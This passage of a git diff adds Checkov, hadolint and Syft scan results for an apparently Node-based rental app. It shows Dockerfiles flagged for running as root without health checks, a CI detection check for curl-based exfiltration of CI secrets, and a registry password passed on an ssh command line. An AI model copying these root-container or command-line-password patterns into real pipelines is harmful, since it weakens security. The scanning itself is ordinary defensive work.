"__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + } + ], + "failed_checks": [ + { + "check_id": "CKV_DOCKER_2", + "bc_check_id": "BC_DKR_2", + "check_name": "Ensure that HEALTHCHECK instructions have been added to container images", + "check_result": { + "result": "FAILED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm AS builder\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "# NEXT_PUBLIC_* vars must be present at build time \u2014 they are inlined into JS bundles\n" + ], + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ], + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ], + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ], + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 20, + "\n" + ], + [ + 21, + "RUN npm install\n" + ], + [ + 22, + "RUN npm run db:generate\n" + ], + [ + 23, + "RUN npm run build\n" + ], + [ + 24, + "\n" + ], + [ + 25, + "FROM node:20-bookworm AS runner\n" + ], + [ + 26, + "\n" + ], + [ + 27, + "WORKDIR /app\n" + ], + [ + 28, + "\n" + ], + [ + 29, + "ENV NODE_ENV=production\n" + ], + [ + 30, + "\n" + ], + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 32, + "\n" + ], + [ + 33, + "COPY --from=builder /app/package.json /app/package-lock.json /app/turbo.json /app/tsconfig.base.json ./\n" + ], + [ + 34, + "COPY --from=builder /app/node_modules ./node_modules\n" + ], + [ + 35, + "COPY --from=builder /app/apps ./apps\n" + ], + [ + 36, + "COPY --from=builder /app/packages ./packages\n" + ], + [ + 37, + "\n" + ], + [ + 38, + "EXPOSE 3000 3001 3002 4000\n" + ], + [ + 39, + "\n" + ], + [ + 40, + "CMD [\"npm\", \"run\", \"start\", \"--workspace\", \"@rentaldrivego/api\"]" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 1, + 40 + ], + "resource": "/Dockerfile.production.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.HealthcheckExists", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_3", + "bc_check_id": "BC_DKR_3", + "check_name": "Ensure that a user for the container has been created", + "check_result": { + "result": "FAILED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm AS builder\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "# NEXT_PUBLIC_* vars must be present at build time \u2014 they are inlined into JS bundles\n" + ], + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ], + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ], + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ], + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 20, + "\n" + ], + [ + 21, + "RUN npm install\n" + ], + [ + 22, + "RUN npm run db:generate\n" + ], + [ + 23, + "RUN npm run build\n" + ], + [ + 24, + "\n" + ], + [ + 25, + "FROM node:20-bookworm AS runner\n" + ], + [ + 26, + "\n" + ], + [ + 27, + "WORKDIR /app\n" + ], + [ + 28, + "\n" + ], + [ + 29, + "ENV NODE_ENV=production\n" + ], + [ + 30, + "\n" + ], + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 32, + "\n" + ], + [ + 33, + "COPY --from=builder /app/package.json /app/package-lock.json /app/turbo.json /app/tsconfig.base.json ./\n" + ], + [ + 34, + "COPY --from=builder /app/node_modules ./node_modules\n" + ], + [ + 35, + "COPY --from=builder /app/apps ./apps\n" + ], + [ + 36, + "COPY --from=builder /app/packages ./packages\n" + ], + [ + 37, + "\n" + ], + [ + 38, + "EXPOSE 3000 3001 3002 4000\n" + ], + [ + 39, + "\n" + ], + [ + 40, + "CMD [\"npm\", \"run\", \"start\", \"--workspace\", \"@rentaldrivego/api\"]" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 1, + 40 + ], + "resource": "/Dockerfile.production.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.UserExists", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_2", + "bc_check_id": "BC_DKR_2", + "check_name": "Ensure that HEALTHCHECK instructions have been added to container images", + "check_result": { + "result": "FAILED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm install\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "ENV NODE_ENV=test\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:deploy && npm run db:generate && npm run type-check && npm run build && npm run test:api:integration\"]" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.test.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.HealthcheckExists", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_3", + "bc_check_id": "BC_DKR_3", + "check_name": "Ensure that a user for the container has been created", + "check_result": { + "result": "FAILED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm install\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "ENV NODE_ENV=test\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:deploy && npm run db:generate && npm run type-check && npm run build && npm run test:api:integration\"]" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.test.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.UserExists", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_2", + "bc_check_id": "BC_DKR_2", + "check_name": "Ensure that HEALTHCHECK instructions have been added to container images", + "check_result": { + "result": "FAILED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "EXPOSE 3000 3001 3002 3003 4000\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:generate && npm run dev\"]" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.dev.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.HealthcheckExists", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-healthcheck-instructions-have-been-added-to-container-images", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_3", + "bc_check_id": "BC_DKR_3", + "check_name": "Ensure that a user for the container has been created", + "check_result": { + "result": "FAILED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "EXPOSE 3000 3001 3002 3003 4000\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:generate && npm run dev\"]" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.dev.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.UserExists", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created", + "details": [], + "check_len": null, + "definition_context_file_path": null + } + ], + "skipped_checks": [], + "parsing_errors": [] + }, + "summary": { + "passed": 205, + "failed": 6, + "skipped": 0, + "parsing_errors": 0, + "resource_count": 3, + "checkov_version": "3.2.501" + }, + "url": "Add an api key '--bc-api-key ' to see more detailed insights via https://bridgecrew.cloud" + }, + { + "check_type": "gitlab_ci", + "results": { + "passed_checks": [ + { + "check_id": "CKV_GITLABCI_1", + "bc_check_id": null, + "check_name": "Suspicious use of curl with CI environment variables in script", + "check_result": { + "result": "PASSED", + "results_configuration": { + "0": "ssh $VPS_USER@$VPS_IP \"docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY\"", + "__startline__": 25, + "__endline__": 25 + } + }, + "code_block": [ + [ + 25, + " - ssh $VPS_USER@$VPS_IP \"docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY\"\n" + ], + [ + 26, + " - ssh $VPS_USER@$VPS_IP \"docker pull $DOCKER_IMAGE\"\n" + ] + ], + "file_path": "/.gitlab-ci.yml", + "file_abs_path": "/scan/.gitlab-ci.yml", + "repo_file_path": "/.gitlab-ci.yml", + "file_line_range": [ + 25, + 26 + ], + "resource": "deploy", + "evaluations": null, + "check_class": "checkov.gitlab_ci.checks.job.SuspectCurlInScript", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": null, + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_GITLABCI_1", + "bc_check_id": null, + "check_name": "Suspicious use of curl with CI environment variables in script", + "check_result": { + "result": "PASSED", + "results_configuration": { + "0": "docker build -t $DOCKER_IMAGE .", + "__startline__": 15, + "__endline__": 15 + } + }, + "code_block": [ + [ + 15, + " - docker build -t $DOCKER_IMAGE .\n" + ], + [ + 16, + " - docker push $DOCKER_IMAGE\n" + ] + ], + "file_path": "/.gitlab-ci.yml", + "file_abs_path": "/scan/.gitlab-ci.yml", + "repo_file_path": "/.gitlab-ci.yml", + "file_line_range": [ + 15, + 16 + ], + "resource": "build", + "evaluations": null, + "check_class": "checkov.gitlab_ci.checks.job.SuspectCurlInScript", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": null, + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_GITLABCI_1", + "bc_check_id": null, + "check_name": "Suspicious use of curl with CI environment variables in script", + "check_result": { + "result": "PASSED", + "results_configuration": { + "0": "docker push $DOCKER_IMAGE", + "__startline__": 16, + "__endline__": 16 + } + }, + "code_block": [ + [ + 16, + " - docker push $DOCKER_IMAGE\n" + ], + [ + 17, + " only:\n" + ] + ], + "file_path": "/.gitlab-ci.yml", + "file_abs_path": "/scan/.gitlab-ci.yml", + "repo_file_path": "/.gitlab-ci.yml", + "file_line_range": [ + 16, + 17 + ], + "resource": "build", + "evaluations": null, + "check_class": "checkov.gitlab_ci.checks.job.SuspectCurlInScript", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": null, + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_GITLABCI_1", + "bc_check_id": null, + "check_name": "Suspicious use of curl with CI environment variables in script", + "check_result": { + "result": "PASSED", + "results_configuration": { + "0": "ssh $VPS_USER@$VPS_IP \"docker pull $DOCKER_IMAGE\"", + "__startline__": 26, + "__endline__": 26 + } + }, + "code_block": [ + [ + 26, + " - ssh $VPS_USER@$VPS_IP \"docker pull $DOCKER_IMAGE\"\n" + ], + [ + 27, + " - ssh $VPS_USER@$VPS_IP \"docker stop myapp || true\"\n" + ] + ], + "file_path": "/.gitlab-ci.yml", + "file_abs_path": "/scan/.gitlab-ci.yml", + "repo_file_path": "/.gitlab-ci.yml", + "file_line_range": [ + 26, + 27 + ], + "resource": "deploy", + "evaluations": null, + "check_class": "checkov.gitlab_ci.checks.job.SuspectCurlInScript", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": null, + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_GITLABCI_1", + "bc_check_id": null, + "check_name": "Suspicious use of curl with CI environment variables in script", + "check_result": { + "result": "PASSED", + "results_configuration": { + "0": "ssh $VPS_USER@$VPS_IP \"docker stop myapp || true\"", + "__startline__": 27, + "__endline__": 27 + } + }, + "code_block": [ + [ + 27, + " - ssh $VPS_USER@$VPS_IP \"docker stop myapp || true\"\n" + ], + [ + 28, + " - ssh $VPS_USER@$VPS_IP \"docker run -d --name myapp -p 80:3000 $DOCKER_IMAGE\"" + ] + ], + "file_path": "/.gitlab-ci.yml", + "file_abs_path": "/scan/.gitlab-ci.yml", + "repo_file_path": "/.gitlab-ci.yml", + "file_line_range": [ + 27, + 28 + ], + "resource": "deploy", + "evaluations": null, + "check_class": "checkov.gitlab_ci.checks.job.SuspectCurlInScript", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": null, + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_GITLABCI_1", + "bc_check_id": null, + "check_name": "Suspicious use of curl with CI environment variables in script", + "check_result": { + "result": "PASSED", + "results_configuration": { + "0": "ssh $VPS_USER@$VPS_IP \"docker run -d --name myapp -p 80:3000 $DOCKER_IMAGE\"", + "__startline__": 28, + "__endline__": 28 + } + }, + "code_block": [ + [ + 28, + " - ssh $VPS_USER@$VPS_IP \"docker run -d --name myapp -p 80:3000 $DOCKER_IMAGE\"" + ] + ], + "file_path": "/.gitlab-ci.yml", + "file_abs_path": "/scan/.gitlab-ci.yml", + "repo_file_path": "/.gitlab-ci.yml", + "file_line_range": [ + 28, + 29 + ], + "resource": "deploy", + "evaluations": null, + "check_class": "checkov.gitlab_ci.checks.job.SuspectCurlInScript", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": null, + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_GITLABCI_3", + "bc_check_id": null, + "check_name": "Detecting image usages in gitlab workflows", + "check_result": { + "result": "PASSED", + "results_configuration": { + "0": "docker:24", + "__startline__": 10, + "__endline__": 10 + } + }, + "code_block": [ + [ + 10, + " image: docker:24\n" + ], + [ + 11, + " services:\n" + ] + ], + "file_path": "/.gitlab-ci.yml", + "file_abs_path": "/scan/.gitlab-ci.yml", + "repo_file_path": "/.gitlab-ci.yml", + "file_line_range": [ + 10, + 11 + ], + "resource": "build", + "evaluations": null, + "check_class": "checkov.gitlab_ci.checks.job.DetectImagesUsage", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": null, + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_GITLABCI_3", + "bc_check_id": null, + "check_name": "Detecting image usages in gitlab workflows", + "check_result": { + "result": "PASSED", + "results_configuration": { + "0": "docker:dind", + "__startline__": 12, + "__endline__": 12 + } + }, + "code_block": [ + [ + 12, + " - docker:dind\n" + ], + [ + 13, + " script:\n" + ] + ], + "file_path": "/.gitlab-ci.yml", + "file_abs_path": "/scan/.gitlab-ci.yml", + "repo_file_path": "/.gitlab-ci.yml", + "file_line_range": [ + 12, + 13 + ], + "resource": "build", + "evaluations": null, + "check_class": "checkov.gitlab_ci.checks.job.DetectImagesUsage", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": null, + "details": [], + "check_len": null, + "definition_context_file_path": null + } + ], + "failed_checks": [], + "skipped_checks": [], + "parsing_errors": [] + }, + "summary": { + "passed": 8, + "failed": 0, + "skipped": 0, + "parsing_errors": 0, + "resource_count": 0, + "checkov_version": "3.2.501" + }, + "url": "Add an api key '--bc-api-key ' to see more detailed insights via https://bridgecrew.cloud" + } +] diff --git a/results/individual-repos/scan/hadolint.json b/results/individual-repos/scan/hadolint.json new file mode 100644 index 0000000..0637a08 --- /dev/null +++ b/results/individual-repos/scan/hadolint.json @@ -0,0 +1 @@ +[] \ No newline at end of file diff --git a/results/individual-repos/scan/syft.json b/results/individual-repos/scan/syft.json new file mode 100644 index 0000000..85c63a5 --- /dev/null +++ b/results/individual-repos/scan/syft.json @@ -0,0 +1 @@ +{"artifacts":[{"id":"47af215a45bf2740","name":"@alloc/quick-lru","version":"5.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@alloc\\/quick-lru:\\@alloc\\/quick-lru:5.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@alloc\\/quick-lru:\\@alloc\\/quick_lru:5.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@alloc\\/quick_lru:\\@alloc\\/quick-lru:5.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@alloc\\/quick_lru:\\@alloc\\/quick_lru:5.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@alloc\\/quick:\\@alloc\\/quick-lru:5.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@alloc\\/quick:\\@alloc\\/quick_lru:5.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40alloc/quick-lru@5.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@alloc/quick-lru/-/quick-lru-5.2.0.tgz","integrity":"sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw==","dependencies":null}},{"id":"77d76c145d8ae8f1","name":"@babel/runtime","version":"7.29.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@babel\\/runtime:\\@babel\\/runtime:7.29.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40babel/runtime@7.29.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@babel/runtime/-/runtime-7.29.2.tgz","integrity":"sha512-JiDShH45zKHWyGe4ZNVRrCjBz8Nh9TMmZG1kh4QTK8hCBTWBi8Da+i7s1fJw7/lYpM4ccepSNfqzZ/QvABBi5g==","dependencies":null}},{"id":"90f3b7ad1f28a06b","name":"@emnapi/runtime","version":"1.10.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@emnapi\\/runtime:\\@emnapi\\/runtime:1.10.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40emnapi/runtime@1.10.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz","integrity":"sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA==","dependencies":{"tslib":"^2.4.0"}}},{"id":"c1858ce75e8e8799","name":"@fastify/busboy","version":"3.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@fastify\\/busboy:\\@fastify\\/busboy:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40fastify/busboy@3.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@fastify/busboy/-/busboy-3.2.0.tgz","integrity":"sha512-m9FVDXU3GT2ITSe0UaMA5rU3QkfC/UXtCU8y0gSN/GugTqtVldOBWIB5V6V3sbmenVZUIpU6f+mPEO2+m5iTaA==","dependencies":null}},{"id":"71780c9abc78bb02","name":"@firebase/app-check-interop-types","version":"0.3.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@firebase\\/app-check-interop-types:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app-check-interop-types:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app_check_interop_types:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app_check_interop_types:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\